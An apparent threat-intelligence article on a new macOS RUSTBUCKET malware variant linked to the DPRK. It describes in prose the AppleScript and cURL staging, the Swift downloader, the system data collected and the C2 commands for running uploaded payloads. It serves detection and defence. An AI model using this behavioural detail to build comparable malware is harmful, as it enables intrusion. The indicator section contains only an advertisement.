The DPRK campaign is utilizing a recently updated version of Rustbucket malware to avoid being detected.
This variant of RUSTBUCKET, targets macOS systems, adds persistence capabilities not previously observed and, at the time of reporting, is undetected by VirusTotal signature engines.
The Elastic Security Labs team has detected a new variant of the RUSTBUCKET malware, a family that has been previously attributed to the BlueNorOff group by Jamf Threat Labs in April 2023.
The DPRK conducts malicious cyber activities and deploys information technology (IT) workers who fraudulently obtain employment to generate revenue.
RUSTBUCKET Malware Infection Chain
As per the research RUSTBUCKET family of malware is under active development. Additionally, at the time of publication, this new variant has zero detections on VirusTotal and is leveraging a dynamic network infrastructure methodology for command and control.
The command /usr/bin/osascript has been used to execute the AppleScript which is responsible for downloading Stage 2 binary from the C2 using cURL.
This session includes the string pd in the body of the HTTP request and cur1-agent as the User-Agent string which saves the Stage 2 binary to /users/shared/.pd,
The Stage 2 binary (.pd) is compiled in Swift and operates based on command-line arguments. The binary expects a C2 URL to be provided as the first parameter when executed.
Upon execution, it invokes the downAndExec function, which is responsible for preparing a POST HTTP request.
To initiate this request, the binary sets the User-Agent string as mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0) and includes the string pw in the body of the HTTP request.
During execution, the malware utilizes specific macOS APIs for various operations. It begins with NSFileManager’s temporaryDirectory function to obtain the current temporary folder, then generates a random UUID using NSUUID’s UUID.init method.
Finally, the malware combines the temporary directory path with the generated UUID to create a unique file location and writes the payload to it.
Once the payload is written to disk, the malware utilizes NSTask to initiate its execution.
Gathers System Information
The malware initiates its operations by dynamically generating a 16-byte random value at runtime. This value serves as a distinctive identifier for the specific instance of the active malware. Subsequently, the malware proceeds to gather comprehensive system information, including:
- Computer name
- List of active processes
- Current timestamp
- Installation timestamp
- System boot time
- Status of all running processes within the system
The malware establishes its initial connection to the C2 server by transmitting the gathered data via a POST request. The request is accompanied by a User-Agent string formatted as Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0).
Upon receiving the request, the C2 server responds with a command ID, which serves as an instruction for the malware. The malware is designed to handle only two commands.
Command ID 0x31-to self-terminate
Command ID 0x30-This command enables the operator to upload malicious Mach-O binaries or shell scripts to the system and execute them.
The malware proceeds by granting execution permissions to the uploaded file using the chmod API.After executing the payload, the malware sends a status update to the server, notifying it of the completed execution, and then sleeps for 60 seconds.
Following this delay, the malware loops to collect system information once again and remains in a waiting state, anticipating the arrival of the next command from the server.
The multi-stage composition of the malware, in addition to the use of Rust programming language and the targeting of macOS, make detection and prevention a significant challenge.
Indicator of compromise:
“AI-based email security measures Protect your business From Email Threats!” – Request a Free Demo.